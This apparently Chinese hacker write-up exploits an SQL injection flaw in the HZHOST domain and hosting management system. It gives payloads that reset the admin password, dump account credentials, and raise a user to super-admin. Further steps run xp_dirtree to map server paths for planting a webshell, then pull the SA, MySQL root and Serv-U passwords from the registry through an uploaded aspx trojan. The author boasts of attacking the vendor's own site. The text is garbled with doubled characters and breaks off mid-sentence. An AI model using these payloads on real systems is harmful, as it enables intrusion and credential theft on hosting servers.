HZHOST域名虛擬主機管理系統(tǒng)sql注射漏洞+進一步利用

1、這是一個域名主機實時管理系統(tǒng)。在百度搜索： title: (域名主機實時管理系統(tǒng)) ，會找到大量采用這種系統(tǒng)的網(wǎng)站！太術(shù)語了。就是在線開通ftp.sql.web的一個管理系統(tǒng)。一套web程序。和IIS管理程序。實現(xiàn)在線開通的玩 意。所以：我們可以免費申請域名和空間！哈哈！web程序方面寫的非常嚴謹。大量的過濾。由于是商業(yè)版的程序，所以我沒有源碼。本來是有的，但是放在家里的電腦上。放暑假時搞的shell現(xiàn)在都被刪了。我現(xiàn)在又比較懶，就沒去弄源代碼。反正大家知道怎么弄的就行了。這又是一個文本框的注射。我真不知道作者是怎么想的。其他地方都被過濾了。就留下域名管理這里沒過濾。官方放暑假的時時候就被我搞

2、搞了一遍，過過了一個月他他發(fā)現(xiàn)了。刪刪了我的shhell。不不知道他怎么么知道我從那那里下的手搞搞的他。他居居然補了漏洞洞。先上圖，再再說下利用方方法。123 UPPDATE memllst SSET u_pss=e10addc39499ba59aabbe566e057ff20f8833e WHHERE uu_nme=admiin-這一句是把用戶戶adminn的密碼修改改為1234456。管理理員的后臺地地址一般是hhttp:/www.xx.coom/masster或者者直接在首頁頁登陸了按切切換到管理員員后臺。如果果adminn不是超級管管理員，那就就有三個辦法法。一是自己構(gòu)造語語句爆出來。

3、二是提升自己注冊的用戶的權(quán)限。三是直接爆網(wǎng)站路徑，再來個差異備份。第一個方法我給給出一條示范范語句：123 annd (seelect top 11 isnuull(caast(uu_nme as nnvarchhar(40000),char(32)+char(94)+iisnulll(castt(U_ppss aas nvaarcharr(40000),chhar(322) frrom (sselectt top 2u_nmme,U_ppss frrom hhzhostt.mmemlstt wheere 1=1 ordder byy u_nnme) t ordder byy u_nnme d

4、desc )0- and 1=11可以同時爆出一一個用戶的帳帳號和密碼。想想爆出其他用用戶的語句自自己構(gòu)造吧。第二個方法是：123 UPPDATE memllst SSET u_sys=66 WHERRE u_nnme=你你注冊的用戶戶名-123 UPPDATE memllst SSET u_pwr=22 WHERRE u_nnme=你你注冊的用戶戶名-這2句話就能夠夠提升自己為為超級管理員員第三個方法很麻麻煩。但是很很有效果。直直搗黃龍。很很強大。我給給出如下語句句，大家自己己研究去吧！爆路徑語句第一步：建立表表123 ;dropp tablle fooofoofooo;creeate tt

5、able foofooofoo(id int idenntity (1,1) not null,namee nvvarchaar (3300) nnot nuull,ddepth intt nott nulll,isffile nvarrchar (50) nulll);- and 1=11第二步：1233 ;deeclaree z nnvarchhar(40000) sset zz=0 x633003a0005c000 inseert fooofooffoo exxecutee mastter.xxp_dirrtree z,1,1- aand 11=1注意：0 x633003a0005c00

6、0 = C: 為ssql ENNCODE其他的自己找工工具去轉(zhuǎn)吧！第三步：暴出總總數(shù) 1233 andd (sellect ccast(ccount(*) ass varcchar(88000)+charr(94) from foofooofoo)0- and 1=11第四步：暴出你你想要的文件件夾名字和文文件名字 1123 aand 0(seleect toop 1 ccast(isfille ass nvarrchar(4000)+chaar(94)+castt(namme ass nvarrchar(4000) froom (seelect distiinct ttop 11 * frr

7、om fooofooffoo orrder bby isffile,nname) t ordder byy isfiile deesc,naame deesc)- and 1=1修改中間紅色的的1，依次爆爆出。至于差異備份語語句。讓nbbsi3告訴訴你吧。對HZHOSTT域名虛擬主主機管理系統(tǒng)統(tǒng)sql注射射漏洞進一步步利用！我記得還有2篇篇關(guān)于hzhhost的漏漏洞利用文章章。名字不記記得了。大家家去搜索“hhzhostt漏洞”找找找吧！里面提提到下面兩點點內(nèi)容！1。是提到c:winddowsttemp下有有hzhosst主機留下下的ftp登登陸記錄。有有用戶名和密密碼2。是利利用hzhoos

8、t拿系統(tǒng)統(tǒng)主機最高權(quán)權(quán)限的。安裝了hzhoost的主機機,其msssql saa密碼,myysql rroot密碼碼還有serrv-u的aadminiistrattor密碼全全部保存在注注冊表中。位位置在HKEY_LOOCAL_MMACHINNEsofftwareehzhoostcoonfigsettiingsmmysqlppassHKKEY_LOOCAL_MMACHINNEsofftwareehzhoostcoonfigsettiingsmmasterrsvrpaass經(jīng)過了hzhoost自己的的加密方式，象象eLVClO44tzsKBBf#deee524433a38722cc1599這樣的

9、字符串。不不過在hzhhost后臺臺可以還原！拿到了saa密碼，或者者root密密碼，最高權(quán)權(quán)限就在眼前前！禁止了ww.s的話。大大家就傳asspx木馬導(dǎo)導(dǎo)撒！我們傳了一個aasp木馬上上去后。在iincscconstrr.asp下下面可以看到到數(shù)據(jù)庫連接接串。然后連連接到數(shù)據(jù)庫庫。通過執(zhí)行行SELECT * FROOM hsstlst語句?？梢钥吹降胶芏嘀鳈C記記錄。如圖發(fā)發(fā)現(xiàn)什么沒有有？h_fttppasss的密碼和hhzhostt主機自己的的加密串很相相似。沒錯，主主機管理的密密碼也是經(jīng)過過他自己的加加密方式加了了密！而我們們在主機管理理的地方！看看到明文密碼碼。說明他又又給還原回來來了。明白了了么？我們先先通過asppx木馬導(dǎo)出出mysqll，mssqql的rooot,sa密密碼加密串后后。我們通過過這條語句，修修改別人的主主機密碼。UPDATE hstllst SSET h_ftppsss=aPPWw3j44zMaK883lHMBBof9fcc298b11d3d0aa WHEERE h_ID=1000004771然后回過頭去看看主機密碼。（這這時候被轉(zhuǎn)成成了明文）就就拿到了rooot密碼為為：sphiil_0700921注意意：由于有多多種限制。我我截的圖可能能不